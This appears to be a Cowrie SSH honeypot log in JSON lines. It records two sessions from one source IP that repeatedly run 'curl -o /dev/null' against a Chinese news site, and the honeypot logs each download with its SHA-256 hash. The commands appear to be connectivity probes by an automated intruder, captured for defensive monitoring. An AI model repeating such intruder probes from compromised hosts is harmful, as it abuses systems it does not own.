{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.223692Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.225140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.233070Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.235282Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.240931Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.243899Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.245393Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.254917Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.257822Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.259012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.262028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.262884Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.291236Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.295795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.296651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.301476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.302339Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.307480Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.310583Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.312780Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.326549Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.336743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.337724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.340949Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.342149Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.343069Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.376857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.378205Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.381296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.382054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.385442Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.396565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.423144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.424342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.431103Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.432228Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.468395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.469623Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.473711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.475321Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.503310Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.508934Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.510133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.516711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.518041Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.521822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.534181Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.548031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.549368Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.554472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.555423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.592896Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.593918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.598970Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.599801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.600369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.620014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.635576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.636663Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.640391Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.643076Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.644010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.647912Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.653395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.657978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.667363Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.675212Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.676264Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.679729Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.683432Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.684477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.701954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.706079Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.711756Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.712808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.731798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.734997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.736502Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.768426Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.782065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.783109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
